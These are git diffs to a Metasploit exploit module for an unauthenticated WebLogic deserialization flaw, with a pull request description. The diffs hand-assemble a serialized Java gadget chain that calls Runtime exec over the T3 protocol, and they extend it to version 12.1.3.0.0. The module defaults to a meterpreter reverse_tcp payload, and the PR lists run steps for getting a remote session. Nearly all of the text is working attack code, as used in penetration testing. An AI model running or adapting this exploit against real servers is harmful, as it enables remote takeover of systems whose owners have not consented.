@@ -416,16 +420,16 @@ class MetasploitModule < Msf::Exploit::Remote
     # ---------------------------
     payload_obj << add_tc_null
 
-    payload_obj << '740004'                               # String, length: 4
-    payload_obj << '65786563'                             # exec
-    payload_obj << '7070'                                 # TC_NULL, TC_NULL
-    payload_obj << '7672'                                 # TC_CLASS, TC_CLASSDESC
-    payload_obj << '0011'                                 # Class name length: 17
-    payload_obj << '6a6176612e6c616e672e'                 # java.lang.Runtime
+    payload_obj << '740004' # String, length: 4
+    payload_obj << '65786563' # exec
+    payload_obj << '7070' # TC_NULL, TC_NULL
+    payload_obj << '7672' # TC_CLASS, TC_CLASSDESC
+    payload_obj << '0011' # Class name length: 17
+    payload_obj << '6a6176612e6c616e672e' # java.lang.Runtime
     payload_obj << '52756e74696d65'
     payload_obj << '00000000000000000000'
     payload_obj << '00'
-    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
   end
 
   def change_handle?
@@ -488,11 +492,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def add_sect
     sect = ''
     if @version_no == Gem::Version.new('12.2.1.3.0')
-     sect << '4c0011'                 # Object, length: 17
-     sect << '6d5f657874726163746f'   # m_extractorCached
-     sect << '72436163686564'
-     sect << '71'                     # TC_REFERENCE
-     sect << '007e0001'               # handle
+      sect << '4c0011' # Object, length: 17
+      sect << '6d5f657874726163746f' # m_extractorCached
+      sect << '72436163686564'
+      sect << '71' # TC_REFERENCE
+      sect << '007e0001' # handle
     end
 
     return sect
@@ -500,16 +504,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def add_class_desc
     class_desc = ''
-    class_desc << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
-    class_desc << '0034'                                 # Class name length: 52
-    class_desc << '636f6d2e74616e676f73'                 # com.tangosol.util.filter.AbstractQueryRecorderFilter
+    class_desc << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
+    class_desc << '0034' # Class name length: 52
+    class_desc << '636f6d2e74616e676f73' # com.tangosol.util.filter.AbstractQueryRecorderFilter
     class_desc << '6f6c2e7574696c2e6669'
     class_desc << '6c7465722e4162737472'
     class_desc << '61637451756572795265'
     class_desc << '636f7264657246696c74'
     class_desc << '6572'
-    class_desc << 'f3b98201f680eb90'                     # SerialVersionUID
-    class_desc << '020000'                               # Serializable, no fields
+    class_desc << 'f3b98201f680eb90' # SerialVersionUID
+    class_desc << '020000' # Serializable, no fields
   end
 
   def add_tc_null
@@ -521,8 +525,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def t3_send(payload_obj)
     print_status('Sending object...')
 
-    request_obj = '000009f3'                              # Original packet length
-    request_obj << '016501'                               # CMD_IDENTIFY_REQUEST, flags
+    request_obj = '000009f3' # Original packet length
+    request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags
     request_obj << 'ffffffffffffffff'
     request_obj << '00000071'
     request_obj << '0000ea60'
@@ -536,171 +540,171 @@ class MetasploitModule < Msf::Exploit::Remote
     request_obj << '700000000c0000000200'
     request_obj << '00000000000000000000'
     request_obj << '01007006'
-    request_obj << 'fe010000'                             # separator
-    request_obj << 'aced0005'                             # STREAM_MAGIC, STREAM_VERSION
-    request_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
-    request_obj << '001d'                                 # Class name length: 29
-    request_obj << '7765626c6f6769632e72'                 # weblogic.rjvm.ClassTableEntry
+    request_obj << 'fe010000' # separator
+    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    request_obj << '001d' # Class name length: 29
+    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
     request_obj << '6a766d2e436c61737354'
     request_obj << '61626c65456e747279'
-    request_obj << '2f52658157f4f9ed'                     # SerialVersionUID
-    request_obj << '0c0000'                               # flags?
-    request_obj << '787072'                               # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
-    request_obj << '0024'                                 # Class name length: 36
-    request_obj << '7765626c6f6769632e63'                 # weblogic.common.internal.PackageInfo
+    request_obj << '2f52658157f4f9ed' # SerialVersionUID
+    request_obj << '0c0000' # flags?
+    request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
+    request_obj << '0024' # Class name length: 36
+    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
     request_obj << '6f6d6d6f6e2e696e7465'
     request_obj << '726e616c2e5061636b61'
     request_obj << '6765496e666f'
-    request_obj << 'e6f723e7b8ae1ec9'                     # SerialVersionUID
-    request_obj << '020009'                               # Serializable, 9 fields
-    request_obj << '490005'                               # Field type: Int, field name length: 5
-    request_obj << '6d616a6f72'                           # major
-    request_obj << '490005'                               # Field type: Int, field name length: 5
-    request_obj << '6d696e6f72'                           # minor
-    request_obj << '49000b'                               # Field type: Int, field name length: 11
-    request_obj << '70617463685570646174'                 # patchUpdate
+    request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
+    request_obj << '020009' # Serializable, 9 fields
+    request_obj << '490005' # Field type: Int, field name length: 5
+    request_obj << '6d616a6f72' # major
+    request_obj << '490005' # Field type: Int, field name length: 5
+    request_obj << '6d696e6f72' # minor
+    request_obj << '49000b' # Field type: Int, field name length: 11
+    request_obj << '70617463685570646174' # patchUpdate
     request_obj << '65'
-    request_obj << '49000c'                               # Field type: Int, field name length: 12
-    request_obj << '726f6c6c696e67506174'                 # rollingPatch
+    request_obj << '49000c' # Field type: Int, field name length: 12
+    request_obj << '726f6c6c696e67506174' # rollingPatch
     request_obj << '6368'
-    request_obj << '49000b'                               # Field type: Int, field name length: 11
-    request_obj << '73657276696365506163'                 # servicePack
+    request_obj << '49000b' # Field type: Int, field name length: 11
+    request_obj << '73657276696365506163' # servicePack
     request_obj << '6b'
-    request_obj << '5a000e'                               # Field type: Z = Bool, field name length: 14
-    request_obj << '74656d706f7261727950'                 # temporaryPatch
+    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
+    request_obj << '74656d706f7261727950' # temporaryPatch
     request_obj << '61746368'
-    request_obj << '4c0009'                               # Field type: Object, field name length: 9
-    request_obj << '696d706c5469746c65'                   # implTitle
-    request_obj << '740012'                               # String, length: 18
-    request_obj << '4c6a6176612f6c616e67'                 # Ljava/lang/String;
+    request_obj << '4c0009' # Field type: Object, field name length: 9
+    request_obj << '696d706c5469746c65' # implTitle
+    request_obj << '740012' # String, length: 18
+    request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
     request_obj << '2f537472696e673b'
-    request_obj << '4c000a'                               # Field type: Object, field name length: 10
-    request_obj << '696d706c56656e646f72'                 # implVendor
-    request_obj << '71007e0003'                           # TC_REFERENCE, handle
-    request_obj << '4c000b'                               # Field type: Object, field name length: 11
-    request_obj << '696d706c56657273696f6e'               # implVersion
-    request_obj << '71007e0003'                           # TC_REFERENCE, handle
-    request_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
-    request_obj << '7702'                                 # TC_ENDBLOCKDATA
+    request_obj << '4c000a' # Field type: Object, field name length: 10
+    request_obj << '696d706c56656e646f72' # implVendor
+    request_obj << '71007e0003' # TC_REFERENCE, handle
+    request_obj << '4c000b' # Field type: Object, field name length: 11
+    request_obj << '696d706c56657273696f6e' # implVersion
+    request_obj << '71007e0003' # TC_REFERENCE, handle
+    request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    request_obj << '7702' # TC_ENDBLOCKDATA
     request_obj << '000078'
-    request_obj << 'fe010000'                             # separator
+    request_obj << 'fe010000' # separator
 
     request_obj << payload_obj
 
-    request_obj << 'fe010000'                             # separator
-    request_obj << 'aced0005'                             # STREAM_MAGIC, STREAM_VERSION
-    request_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
-    request_obj << '001d'                                 # Class name length: 29
-    request_obj << '7765626c6f6769632e72'                 # weblogic.rjvm.ClassTableEntry
+    request_obj << 'fe010000' # separator
+    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    request_obj << '001d' # Class name length: 29
+    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
     request_obj << '6a766d2e436c61737354'
     request_obj << '61626c65456e747279'
-    request_obj << '2f52658157f4f9ed'                     # SerialVersionUID
+    request_obj << '2f52658157f4f9ed' # SerialVersionUID
     request_obj << '0c0000'
-    request_obj << '787072'                               # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
-    request_obj << '0021'                                 # Class name length: 33
-    request_obj << '7765626c6f6769632e63'                 # weblogic.common.internal.PeerInfo
+    request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
+    request_obj << '0021' # Class name length: 33
+    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo
     request_obj << '6f6d6d6f6e2e696e7465'
     request_obj << '726e616c2e5065657249'
     request_obj << '6e666f'
-    request_obj << '585474f39bc908f1'                     # SerialVersionUID
-    request_obj << '020007'                               # Serializable, 7 fields
-    request_obj << '490005'                               # Field type: Int, field name length: 5
-    request_obj << '6d616a6f72'                           # major
-    request_obj << '490005'                               # Field type: Int, field name length: 5
-    request_obj << '6d696e6f72'                           # minor
-    request_obj << '49000b'                               # Field type: Int, field name length: 11
-    request_obj << '70617463685570646174'                 # patchUpdate
+    request_obj << '585474f39bc908f1' # SerialVersionUID
+    request_obj << '020007' # Serializable, 7 fields
+    request_obj << '490005' # Field type: Int, field name length: 5
+    request_obj << '6d616a6f72' # major
+    request_obj << '490005' # Field type: Int, field name length: 5
+    request_obj << '6d696e6f72' # minor
+    request_obj << '49000b' # Field type: Int, field name length: 11
+    request_obj << '70617463685570646174' # patchUpdate
     request_obj << '65'
-    request_obj << '49000c'                               # Field type: Int, field name length: 12
-    request_obj << '726f6c6c696e67506174'                 # rollingPatch
+    request_obj << '49000c' # Field type: Int, field name length: 12
+    request_obj << '726f6c6c696e67506174' # rollingPatch
     request_obj << '6368'
-    request_obj << '49000b'                               # Field type: Int, field name length: 11
-    request_obj << '73657276696365506163'                 # servicePack
+    request_obj << '49000b' # Field type: Int, field name length: 11
+    request_obj << '73657276696365506163' # servicePack
     request_obj << '6b'
-    request_obj << '5a000e'                               # Field type: Z = Bool, field name length: 14
-    request_obj << '74656d706f7261727950'                 # temporaryPatch
+    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
+    request_obj << '74656d706f7261727950' # temporaryPatch
     request_obj << '61746368'
-    request_obj << '5b0008'                               # Field type: Array, field name length: 8
-    request_obj << '7061636b61676573'                     # packages
-    request_obj << '740027'                               # String, length: 39
-    request_obj << '5b4c7765626c6f676963'                 # [Lweblogic/common/internal/PackageInfo;
+    request_obj << '5b0008' # Field type: Array, field name length: 8
+    request_obj << '7061636b61676573' # packages
+    request_obj << '740027' # String, length: 39
+    request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo;
     request_obj << '2f636f6d6d6f6e2f696e'
     request_obj << '7465726e616c2f506163'
     request_obj << '6b616765496e666f3b'
-    request_obj << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
-    request_obj << '0024'                                 # Class name length: 36
-    request_obj << '7765626c6f6769632e63'                 # weblogic.common.internal.VersionInfo
+    request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
+    request_obj << '0024' # Class name length: 36
+    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo
     request_obj << '6f6d6d6f6e2e696e7465'
     request_obj << '726e616c2e5665727369'
     request_obj << '6f6e496e666f'
-    request_obj << '972245516452463e'                     # SerialVersionUID
-    request_obj << '020003'                               # Serializable, 3 fields
-    request_obj << '5b0008'                               # Field type: Array, field name length: 8
-    request_obj << '7061636b61676573'                     # packages
-    request_obj << '71007e0003'                           # TC_REFERENCE, handle
-    request_obj << '4c000e'                               # Field type: Object, field name length: 14
-    request_obj << '72656c65617365566572'                 # releaseVersion
+    request_obj << '972245516452463e' # SerialVersionUID
+    request_obj << '020003' # Serializable, 3 fields
+    request_obj << '5b0008' # Field type: Array, field name length: 8
+    request_obj << '7061636b61676573' # packages
+    request_obj << '71007e0003' # TC_REFERENCE, handle
+    request_obj << '4c000e' # Field type: Object, field name length: 14
+    request_obj << '72656c65617365566572' # releaseVersion
     request_obj << '73696f6e'
-    request_obj << '740012'                               # String, length: 18
-    request_obj << '4c6a6176612f6c616e67'                 # Ljava/lang/String;
+    request_obj << '740012' # String, length: 18
+    request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
     request_obj << '2f537472696e673b'
-    request_obj << '5b0012'                               # Field type: Array, field name length: 18
-    request_obj << '76657273696f6e496e66'                 # versionInfoAsBytes
+    request_obj << '5b0012' # Field type: Array, field name length: 18
+    request_obj << '76657273696f6e496e66' # versionInfoAsBytes
     request_obj << '6f41734279746573'
-    request_obj << '740002'                               # String, length: 2
-    request_obj << '5b42'                                 # [B
-    request_obj << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
-    request_obj << '0024'                                 # Class name length: 36
-    request_obj << '7765626c6f6769632e63'                 # weblogic.common.internal.PackageInfo
+    request_obj << '740002' # String, length: 2
+    request_obj << '5b42' # [B
+    request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
+    request_obj << '0024' # Class name length: 36
+    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
     request_obj << '6f6d6d6f6e2e696e7465'
     request_obj << '726e616c2e5061636b61'
     request_obj << '6765496e666f'
-    request_obj << 'e6f723e7b8ae1ec9'                     # SerialVersionUID
-    request_obj << '020009'                               # Serializable, 9 fields
-    request_obj << '490005'                               # Field type: Int, field name length: 5
-    request_obj << '6d616a6f72'                           # major
-    request_obj << '490005'                               # Field type: Int, field name length: 5
-    request_obj << '6d696e6f72'                           # minor
-    request_obj << '49000b'                               # Field type: Int, field name length: 11
-    request_obj << '70617463685570646174'                 # patchUpdate
+    request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
+    request_obj << '020009' # Serializable, 9 fields
+    request_obj << '490005' # Field type: Int, field name length: 5
+    request_obj << '6d616a6f72' # major
+    request_obj << '490005' # Field type: Int, field name length: 5
+    request_obj << '6d696e6f72' # minor
+    request_obj << '49000b' # Field type: Int, field name length: 11
+    request_obj << '70617463685570646174' # patchUpdate
     request_obj << '65'
-    request_obj << '49000c'                               # Field type: Int, field name length: 12
-    request_obj << '726f6c6c696e67506174'                 # rollingPatch
+    request_obj << '49000c' # Field type: Int, field name length: 12
+    request_obj << '726f6c6c696e67506174' # rollingPatch
     request_obj << '6368'
-    request_obj << '49000b'                               # Field type: Int, field name length: 11
-    request_obj << '73657276696365506163'                 # servicePack
+    request_obj << '49000b' # Field type: Int, field name length: 11
+    request_obj << '73657276696365506163' # servicePack
     request_obj << '6b'
-    request_obj << '5a000e'                               # Field type: Z = Bool, field name length: 14
-    request_obj << '74656d706f7261727950'                 # temporaryPatch
+    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
+    request_obj << '74656d706f7261727950' # temporaryPatch
     request_obj << '61746368'
-    request_obj << '4c0009'                               # Field type: Object, field name length: 9
-    request_obj << '696d706c5469746c65'                   # implTitle
-    request_obj << '71007e0005'                           # TC_REFERENCE, handle
-    request_obj << '4c000a'                               # Field type: Object, field name length: 10
-    request_obj << '696d706c56656e646f72'                 # implVendor
-    request_obj << '71007e0005'                           # TC_REFERENCE, handle
-    request_obj << '4c000b'                               # Field type: Object, field name length: 11
-    request_obj << '696d706c56657273696f'                 # implVersion
+    request_obj << '4c0009' # Field type: Object, field name length: 9
+    request_obj << '696d706c5469746c65' # implTitle
+    request_obj << '71007e0005' # TC_REFERENCE, handle
+    request_obj << '4c000a' # Field type: Object, field name length: 10
+    request_obj << '696d706c56656e646f72' # implVendor
+    request_obj << '71007e0005' # TC_REFERENCE, handle
+    request_obj << '4c000b' # Field type: Object, field name length: 11
+    request_obj << '696d706c56657273696f' # implVersion
     request_obj << '6e'
-    request_obj << '71007e0005'                           # TC_REFERENCE, handle
-    request_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
-    request_obj << '7702000078'                           # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA
-    request_obj << 'fe00ff'                               # separator
+    request_obj << '71007e0005' # TC_REFERENCE, handle
+    request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA
+    request_obj << 'fe00ff' # separator
     request_obj << 'fe010000'
-    request_obj << 'aced0005'                             # STREAM_MAGIC, STREAM_VERSION
-    request_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
-    request_obj << '0013'                                 # Class name length: 19
-    request_obj << '7765626c6f6769632e72'                 # weblogic.rjvm.JVMID
+    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    request_obj << '0013' # Class name length: 19
+    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
     request_obj << '6a766d2e4a564d4944'
-    request_obj << 'dc49c23ede121e2a'                     # SerialVersionUID
+    request_obj << 'dc49c23ede121e2a' # SerialVersionUID
     request_obj << '0c0000'
-    request_obj << '787077'                               # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
+    request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
     request_obj << '4621'
     request_obj << '000000000000000000'
-    request_obj << '09'                                   # length: 9
-    request_obj << '3132372e302e312e31'                   # 127.0.1.1
-    request_obj << '000b'                                 # length: 11
-    request_obj << '75732d6c2d627265656e'                 # us-l-breens
+    request_obj << '09' # length: 9
+    request_obj << '3132372e302e312e31' # 127.0.1.1
+    request_obj << '000b' # length: 11
+    request_obj << '75732d6c2d627265656e' # us-l-breens
     request_obj << '73'
     request_obj << 'a53caff10000000700'
     request_obj << '001b59'
@@ -708,15 +712,15 @@ class MetasploitModule < Msf::Exploit::Remote
     request_obj << 'ffffffffffffffffffff'
     request_obj << 'ffffffff'
     request_obj << '0078'
-    request_obj << 'fe010000'                             # separator
-    request_obj << 'aced0005'                             # STREAM_MAGIC, STREAM_VERSION
-    request_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
-    request_obj << '0013'                                 # Class name length: 19
-    request_obj << '7765626c6f6769632e72'                 # weblogic.rjvm.JVMID
+    request_obj << 'fe010000' # separator
+    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    request_obj << '0013' # Class name length: 19
+    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
     request_obj << '6a766d2e4a564d4944'
-    request_obj << 'dc49c23ede121e2a'                     # SerialVersionUID
+    request_obj << 'dc49c23ede121e2a' # SerialVersionUID
     request_obj << '0c0000'
-    request_obj << '787077'                               # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
+    request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
     request_obj << '1d0181401281'
     request_obj << '34bf427600093132372e'
     request_obj << '302e312e31a53caff1'
@@ -737,13 +741,13 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_arr.each do |part|
       formatted_payload << '74' # denotes a string
       formatted_payload << part.length.to_s(16).rjust(4, '0')
-      formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join
+      formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
     end
 
     formatted_payload
   end
 
-  def execute_command(cmd, opts={})
+  def execute_command(cmd, _opts = {})
     cmd.prepend('/bin/sh -c ')
     cmd = build_payload_obj(cmd)
 
@@ -760,7 +764,7 @@ class MetasploitModule < Msf::Exploit::Remote
     t3_handshake
 
     if target.name == 'Windows'
-      win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
+      win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })
       win_obj.prepend('cmd.exe /c ')
       win_obj = build_payload_obj(win_obj)
       t3_send(win_obj)

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Unix',
             {
-              'Platform'        => %w{ unix linux },
+              'Platform'        => %w[ unix linux ],
               'CmdStagerFlavor' => 'printf',
               'Arch'            => [ ARCH_X86, ARCH_X64 ],
               'DefaultOptions'  => { 'Payload' =>  'linux/x86/meterpreter/reverse_tcp' }

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -6,9 +6,9 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Exploit::Remote::Tcp
-  include Exploit::CmdStager
-  include Exploit::Powershell
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
 
   def initialize(info = {})
     super(update_info(info,

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     web_req = "GET /console/login/LoginForm.jsp HTTP/1.1\nHost: #{peer}\n\n"
     sock.put(web_req)
-    sleep(1)
+    sleep(2)
     res = sock.get_once
     disconnect
 
@@ -263,21 +263,27 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_obj << '6f74746f6d'
     payload_obj << '71'                                   # TC_REFERENCE
     payload_obj << '007e0001'                             # handle
+    # -----------------------------
     payload_obj << '4c000c'                               # Field type: Object, field name length: 12
     payload_obj << '6d5f6f416e63686f72546f70'             # m_oAnchorTop
     payload_obj << '71'                                   # TC_REFERENCE
     payload_obj << '007e0001'                             # handle
-    payload_obj << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
-    payload_obj << '0034'                                 # Class name length: 52
-    payload_obj << '636f6d2e74616e676f73'                 # com.tangosol.util.filter.AbstractQueryRecorderFilter
-    payload_obj << '6f6c2e7574696c2e6669'
-    payload_obj << '6c7465722e4162737472'
-    payload_obj << '61637451756572795265'
-    payload_obj << '636f7264657246696c74'
-    payload_obj << '6572'
-    payload_obj << 'f3b98201f680eb90'                     # SerialVersionUID
-    payload_obj << '020000'                               # Serializable, no fields
-    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    # -----------------------------
+    #payload_obj << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
+    #payload_obj << '0034'                                 # Class name length: 52
+    #payload_obj << '636f6d2e74616e676f73'                 # com.tangosol.util.filter.AbstractQueryRecorderFilter
+    #payload_obj << '6f6c2e7574696c2e6669'
+    #payload_obj << '6c7465722e4162737472'
+    #payload_obj << '61637451756572795265'
+    #payload_obj << '636f7264657246696c74'
+    #payload_obj << '6572'
+    #payload_obj << 'f3b98201f680eb90'                     # SerialVersionUID
+    #payload_obj << '020000'                               # Serializable, no fields
+    unless @version_no == Gem::Version.new('12.1.3.0.0')
+      payload_obj << add_class_desc
+    end
+    # ----------------------------
+    payload_obj << '7870'                                  # TC_ENDBLOCKDATA, TC_NULL
     payload_obj << '00000000'
     payload_obj << '00000000'
     payload_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
@@ -351,7 +357,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_obj << '71'                                   # TC_REFERENCE
     payload_obj << '007e0005'                             # handle
     payload_obj << '7871'                                 # TC_ENDBLOCKDATA, TC_REFERENCE
-    payload_obj << '007e001e'                             # handle
+    payload_obj << (change_handle? ? '007e001d' : '007e001e')
     payload_obj << '00000000'
     payload_obj << '7572'                                 # TC_ARRAY, TC_CLASSDESC
     payload_obj << '0013'                                 # Class name length: 19
@@ -375,23 +381,23 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_obj << '740009'                               # String, length: 9
     payload_obj << '6765744d6574686f64'                   # getMethod
     payload_obj << '7371'                                 # TC_OBJECT, TC_REFERENCE
-    payload_obj << '007e0022'                             # handle
+    payload_obj << (change_handle? ? '007e0021' : '007e0022')
     payload_obj << '00000000'
     payload_obj << '7571'                                 # TC_ARRAY, TC_REFERENCE
-    payload_obj << '007e0025'                             # handle
+    payload_obj << (change_handle? ? '007e0024' : '007e0025')
     payload_obj << '00000002'                             # array size: 2
     payload_obj << '7075'                                 # TC_NULL, TC_ARRAY
     payload_obj << '71'                                   # TC_REFERENCE
-    payload_obj << '007e0025'                             # handle
+    payload_obj << (change_handle? ? '007e0024' : '007e0025')
     payload_obj << '00000000'
     payload_obj << add_tc_null
     payload_obj << '740006'                               # TC_STRING, length: 6
     payload_obj << '696e766f6b65'                         # invoke
     payload_obj << '7371'                                 # TC_OBJECT, TC_REFERENCE
-    payload_obj << '007e0022'                             # handle
+    payload_obj << (change_handle? ? '007e0021' : '007e0022')
     payload_obj << '00000000'
     payload_obj << '7571'                                 # TC_ARRAY, TC_REFERENCE
-    payload_obj << '007e0025'                             # handle
+    payload_obj << (change_handle? ? '007e0024' : '007e0025')
     payload_obj << '00000001'
     payload_obj << '7572'                                 # TC_ARRAY, TC_CLASSDESC
     payload_obj << '0013'                                 # Class name length: 19
@@ -430,9 +436,15 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
   end
 
+  def change_handle?
+    @version_no == Gem::Version.new('12.1.3.0.0')
+  end
+
   def limit_filter_uid
     case @version_no
-    when Gem::Version.new('12.2.1.3')
+    when Gem::Version.new('12.1.3.0.0')
+      return '99022596d7b45953'
+    when Gem::Version.new('12.2.1.3.0')
       return 'ab2901b976c4e271'
     else
       return '954e4590be89865f'
@@ -441,7 +453,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def chained_extractor_uid
     case @version_no
-    when Gem::Version.new('12.2.1.3')
+    when Gem::Version.new('12.1.3.0.0')
+      return '889f81b0945d5b7f'
+    when Gem::Version.new('12.2.1.3.0')
       return '06ee10433a4cc4b4'
     else
       return '435b250b72f63db5'
@@ -450,7 +464,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def abstract_extractor_uid
     case @version_no
-    when Gem::Version.new('12.2.1.3')
+    when Gem::Version.new('12.1.3.0.0')
+      return '658195303e723821'
+    when Gem::Version.new('12.2.1.3.0')
       return '752289ad4d460138'
     else
       return '9b1be18ed70100e5'
@@ -459,7 +475,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def reflection_extractor_uid
     case @version_no
-    when Gem::Version.new('12.2.1.3')
+    when Gem::Version.new('12.1.3.0.0')
+      return 'ee7ae995c02fb4a2'
+    when Gem::Version.new('12.2.1.3.0')
       return '87973791b26429dd'
     else
       return '1f62f564b951b614'
@@ -468,7 +486,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def reflect_extract_count
     case @version_no
-    when Gem::Version.new('12.2.1.3')
+    when Gem::Version.new('12.2.1.3.0')
       return '3'
     else
       return '2'
@@ -477,7 +495,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def add_sect
     sect = ''
-    if @version_no == Gem::Version.new('12.2.1.3')
+    if @version_no == Gem::Version.new('12.2.1.3.0')
      sect << '4c0011'                 # Object, length: 17
      sect << '6d5f657874726163746f'   # m_extractorCached
      sect << '72436163686564'
@@ -488,8 +506,22 @@ class MetasploitModule < Msf::Exploit::Remote
     return sect
   end
 
+  def add_class_desc
+   class_desc = ''
+   class_desc << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
+   class_desc << '0034'                                 # Class name length: 52
+   class_desc << '636f6d2e74616e676f73'                 # com.tangosol.util.filter.AbstractQueryRecorderFilter
+   class_desc << '6f6c2e7574696c2e6669'
+   class_desc << '6c7465722e4162737472'
+   class_desc << '61637451756572795265'
+   class_desc << '636f7264657246696c74'
+   class_desc << '6572'
+   class_desc << 'f3b98201f680eb90'                     # SerialVersionUID
+   class_desc << '020000'                               # Serializable, no fields
+  end
+
   def add_tc_null
-    return '70' if @version_no == Gem::Version.new('12.2.1.3')
+    return '70' if @version_no == Gem::Version.new('12.2.1.3.0')
 
     return ''
   end

--- a/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
+++ b/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ],
           [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
         ],
-      'Platform'       => %w{ unix linux win },
+      'Platform'       => %w[ unix linux win ],
       'Arch'           => [ ARCH_X86, ARCH_X64 ],
       'Targets'        =>
         [


### PR DESCRIPTION
This adds an exploit module for WebLogic server versions `12.1.3.0`, `12.2.1.3.0`, and `12.2.1.4.0`.

Unauthenticated remote code execution can be achieved by sending a serialized `BadAttributeValueExpException` object over the  T3 protocol to vulnerable WebLogic servers.

## Verification

- [x] Install the application
- [x] Start msfconsole
- [x] Do: ```use exploit/multi/misc/weblogic_deserialize_badattrval```
- [x] Do: ```set RHOSTS <ip>```
- [x] Do: ```run```
- [x] You should get a meterpreter session.

## Scenarios
### WebLogic `v12.1.3.0.0` on Linux
  
  ```
  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set target 1
  target => 1
  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set payload linux/x64/meterpreter/reverse_tcp
